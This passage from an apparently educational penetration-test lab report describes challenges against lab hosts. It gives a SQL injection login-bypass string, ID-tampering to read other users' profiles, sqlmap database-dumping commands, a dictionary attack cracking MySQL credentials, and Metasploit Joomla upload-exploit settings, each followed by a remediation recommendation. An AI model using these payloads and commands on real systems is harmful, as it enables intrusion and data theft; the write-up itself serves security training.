text is ignored at execution time.
Methodology:
CH 9.1 Present contact number of user named Steve on http://10.10.0.2/moviescope
Typed the url http://10.10.0.2/moviescope in the browser and clicked on login button and typed script Movie‘ or
1=1 -- in username and password field and logged in
Figure
9.1.1
With
this got
logged
in with
the user
Adam as
shown
below
illustration
Figure 9.1.2
After logging in clicked on the “View Profile” and found the link illustrated below
10.10.0.2/moviescope/viewprofile.aspx?id=1
Figure 9.1.3
Just changed the id number from 1to 2 10.10.0.2/moviescope/viewprofile.aspx?id=2 and got the profile of John.
Figure 9.1.4
Just changed the id number from 2to 3 10.10.0.2/moviescope/viewprofile.aspx?id=3 and got the profile of Kety
Figure 9.1.5
Finally changed the id number from 3 to 4 10.10.0.2/moviescope/viewprofile.aspx?id=4 and got the profile of
Steve and got the contact number of steve as illustrated below.
Figure 9.1.6
To extract the table and user logged into site http://10.10.0.2/xsecurity and logged in as username:abhi and
password :abhi
Figure 9.2.1
Figure 9.2.2
Intercepted the url http://10.10.0.2/xsecurity site in burpsuite and found the below illustration.
Figure 9.2.3
After intercepting in Burpsuite,copy pasted the text in blue and red in a text file xsecurity.txt
Figure
9.2.4
Saved
the
text
file in
Figure 9.2.5
Then with the help of sqlmap command : sqlmap -r /root/xsecurity --dbs done automatic sql injection
Figure 9.2.6
In the below illustration we will see the 9 databases extracted ie
GoodShopping.Master,model,moviescope,msdb,queenhotel,Real_Home,tempdb,Xsecurity
Figure 9.2.7
Then with the help of sqlmap command : sqlmap -r /root/xsecurity -D xsecurity --tables done sql injection with the
help of the text file xsecurity.txt
Figure 9.2.8
Below illustration shows that sqlmap got a 302 redirect to http://10.10.0.2:8/xsecurity/index.aspx and txtusername is
vulnerable also shown the backend database server .operating system and web application technology.
Figure 9.2.9
In the below illustration extracted the 3 tables ie User_Profile,Users.comments of database Xsecurity
Figure 9.2.10
With the help of the given below command further extracted the columns of xsecurity database
Figure 9.2.11
Illustration shown below has 3 extracted column and type of xsecurity ie password,userid and username
Figure 9.2.12
Figure 9.3.1
Found the illustrated details ie SQL server database verion id Microsoft SQL Server 2008 (RTM) 10.0.1600.22
(x64)
Figure 9.3.1
Recommendation : Input Validation is any web application’s first line of defense. That said, Input Validation is
limited to knowing what the immediate usage of an untrusted input is and cannot predict where that input will finally
be used when included in output. Practically all free text falls into this category since we always need to allow for
valid uses of quotes, angular brackets and other characters.
CHALLENGE 10:
Objective:
Compromise the MySQL database running on the “ECOMM” machine and extract the
table data. The username and password are weak and do not follow best practices.
IP address of all Operating Host names Open ports in Services running in all open
Machines system and there respective machine ports
versions
Threat Description:
vulnerability in the MySQL server that could allow potential attackers to access MySQL
databases without inputting proper authentication credentials.An attacker can crack the password
hashes using dictionary attacks and maintain their unauthorized access on the server even if this
authentication bypass vulnerability is later fixed.
Tools Used:
HexorBase is a database application designed for administering and auditing multiple database
servers simultaneously from a centralized location, it is capable of performing SQL queries and
bruteforce attacks against common database servers (MySQL, SQLite, Microsoft SQL Server,
Oracle, PostgreSQL ). HexorBase allows packet routing through proxies or even metasploit
pivoting antics to communicate with remotely inaccessible servers which are hidden within local
subnets.
Methodology:
With the help of Zenmap anyways we had found out mysql port 3306 is open
Figure 10.1
Figure 10.2
After opening hexorbase tool it prompted for user name and password
Figure 10.3
Further selected Database Bruteforce and selected Mysql and typed the server ip address ie 10.10.0.3 and selected
port 3306 and further selected user list and Word list
Figure 10.4
After selecting user list and word list started Dictionary attack and cracked the username and password of database
server ie username: root and password: test
Figure 10.5
Further logged in to the Mysql database server 10.10.0.3 with the help of the cracked username and password
Figure 10.6
Further extracted the Tables from the Mysql database Server as illustrated below
Figure 10.7
Further extracted the Tables from the Mysql Server as illustrated below
Figure 10.8
Further extracted the Tables from Information schema from the Mysql Server as illustrated below
Figure 10.9
Further extracted the Tables from Information schema from the Mysql Server as illustrated below
Figure 10.10
Further extracted the Tables from Information schema from the Mysql Server as illustrated below
Figure 10.11
Recommendation : It is recommended that always follow standard password policy ie.minimum of 8 characters and
Alphanumeric with special characters and non guessable strong passwords.
CHALLENGE 11:
Objective:
Exploit the machine named as “RDDept” and present the hash value for the RnD NDA.pdf
document.
IP address of all Operating Host names Open ports in Services running in all open
Machines system and there respective machine ports
versions
Threat Description: The vulnerability exists in the Media Manager component, which comes by
default in Joomla, allowing arbitrary file uploads, and results in arbitrary code execution
Tools Used:
Nessus : Nessus is a remote security scanning tool, which scans a computer and raises an alert if it
discovers any vulnerabilities that malicious hackers could use to gain access to any computer you
have connected to a network.
Methodology:
With the help of Nessus Tool done the Vulnerability assessment and found the vulnerability
given below
Figure 11.1
Just put the url 172.19.19.9 in web browser
Figure 11.2
Further browsed with the project mentioned ECSA ie 172.19.19.9/ECSA and right clicked and seen the view source
of the page
Figure 11.3
When done the view source found the open source content management used is Joomla
Figure 11.4
By using Kali Operating system machine, started the exploit process by opening command line terminal, and typed
msfconsole and pressed Enter. This launched msfconsole.
Figure 11.5
After launching msfconsole searched for Joomla exploit module
Figure 11.6
After searching joomla exploit module used exploit/unix/webapp/joomla_media_upload_exec and did show options
Figure 11.7
The set RHOST 172.19.19.9,set LHOST 192.168.0.5,set TARGETURI /ECSA abd verified with show options
Figure 11.8
Then searched for payloads with the help of command “show payloads”
Figure 11.9
Figure 11.10
Changed the directory path and came to c drive root and checked directory listings.Then changed the directory to
users and with the help of command in c:\users\search -f *.pdf
Figure 11.11
After searching the file downloaded the file to root and extracted the md5sum of the required file RnD NDA.pdf
Figure 11.12
Recommendation: Upgrade to the latest version of Joomla in which public access isn't allowed to the Media
Manager, and you will need to supply a valid username and password
Appendixes
Appendix A: References
1) https://support.microsoft.com/en-us/kb/958644
2) http://www.cve.mitre.org
3) http://www.cvedetails.com
4) https://www.acunetix.com/websitesecurity/sql-injection/
5) http://phpsecurity.readthedocs.io/en/latest/Cross-Site-Scripting-(XSS).html
6) http://www.esecurityplanet.com/open-source-security/top-5-wordpress-vulnerabilities-and-how-to-fix-them.html
7) https://www.digitalocean.com/community/tutorials/how-to-protect-your-server-against-the-shellshock-bash-
vulnerability
8) http://tools.kali.org/vulnerability-analysis/hexorbase
9) http://www.cvedetails.com/cve/CVE-2013-5576/#references
Appendix B: Glossary
Black Box Black Box testing is used when the organization desires to test internal or external network
Penetration security from the perspective of an outsider with no knowledge of the organization, other than
Test: that which is in the public domain and freely available to anyone. The attacker has no advance
knowledge of the organization, except, perhaps, the name of the target. Black box testing most
closely simulates what an organization could expect from an outside attack in that, once any
discovered vulnerability is exploited and access to the network is gained, the attacker continues
to exploit a specific vulnerability as far as possible, with the ultimate goal of obtaining
administrative-level access to the vulnerable machine or extending network control to other
machines. Because only the first successful vulnerability is exploited, other vulnerabilities
within the network go untested and may lead to a false sense of security. Attacks are carried
out as covertly as possible. Once the attacks are observed and reported by the target
organization, black box testing ceases. Black box testing is also referred to as “no knowledge
testing.” It is the most unreliable form of penetration testing.
Crystal Box Crystal Box testing is used when the organization desires to test internal or external network
Penetration security from the perspective of an attacker with full and complete knowledge of the
Test organization, similar to the knowledge possessed by an administrator. This knowledge
normally includes passwords for routers, firewalls and IDS Systems, network topology,
machine configurations and other information that an IT administrator would possess. As many
discovered vulnerabilities as possible are exploited within the timeframe specified in the
engagement letter. Attacks may be carried out overtly or covertly, as the organization desires.
Crystal box testing provides the most thorough assessment of the security posture of the
network, in that multiple attack avenues are pursued with detailed knowledge of the
organization. Crystal box testing is also referred to as “full knowledge testing” or “white box
testing.”
Grey Box Grey Box testing is used when the organization desires to test internal or external network
Penetration security from the perspective of an attacker with only limited knowledge of the organization,
Test similar to the knowledge possessed by a non-IT employee. This knowledge normally includes
machine names, shared folder names, IP addresses, naming conventions and other information
that a normal user with no special access would know about the target organization. As many
discovered vulnerabilities as possible are exploited within the timeframe specified in the
engagement letter. Attacks may be carried out overtly or covertly, as the organization desires.
Grey box testing assures a more thorough assessment of the security posture of the network, in
that several possible attack avenues are pursued. Grey box testing is also referred to as “partial
knowledge testing.”
Internet Foot Internet foot printing uses the Internet to search for information in the public domain that could
Printing assist an attacker in gaining access to the target’s network. While some information placed in
the public domain is required by law, regulation, or to assist in conducting business, excess
information in the public domain could result in an attacker gaining enough knowledge to
conduct logical, physical or social engineering attacks against the target. Expected results of
Internet Footprinting are: location addresses, business hours, telephone and fax numbers,
contact names and e-mail addresses; partners; merger/acquisition news; privacy and security
policies in place; links to other Web servers; employee names and information; networking
equipment used; Web pages using input forms, assigned IP address ranges and Points of
Contact, etc.
Penetration The objective of penetration testing is to exploit discovered vulnerabilities to demonstrate that
Test specific vulnerabilities, present in the organization’s network, can be used to compromise
network security. It uses intrusion techniques, identical or similar to methods used by attackers
to breach network security, collect data and elevate the attacker’s privileges within the
network. It can also reveal the extent to which an organization’s security incident response
capability is alerted by observing the organization’s response to attack methodologies.
Physical See Social Engineering
Penetration
Testing
Social Also called physical penetration testing. Social Engineering includes “successful or
Engineering unsuccessful attempts to influence a person(s) into either revealing information or acting in a
manner that would result in unauthorized access, unauthorized use, or unauthorized disclosure
to/of an information system, network or data” using human-based or computer based
techniques. In other words, using deception to con someone into providing information or
access they would not normally have provided. It’s the “human side” of breaking into a
network and preys on the qualities of human nature, such as the desire to be helpful, the
tendency to trust people and the fear of getting in trouble. Social engineering can also include
the practices of “dumpster diving” (searching the target’s refuse for useful information) and
“shoulder surfing” (obtaining passwords by surreptitiously watching a user type in their
password).
Vulnerability The objective of vulnerability testing is to discover possible attack vectors that can be used to
Assessment compromise the target network. It is a systematic examination of an information system or
product to determine the adequacy of security measures, identify security deficiencies, provide
data from which to predict the effectiveness of proposed security measures, and confirm the
adequacy of such measures after implementation.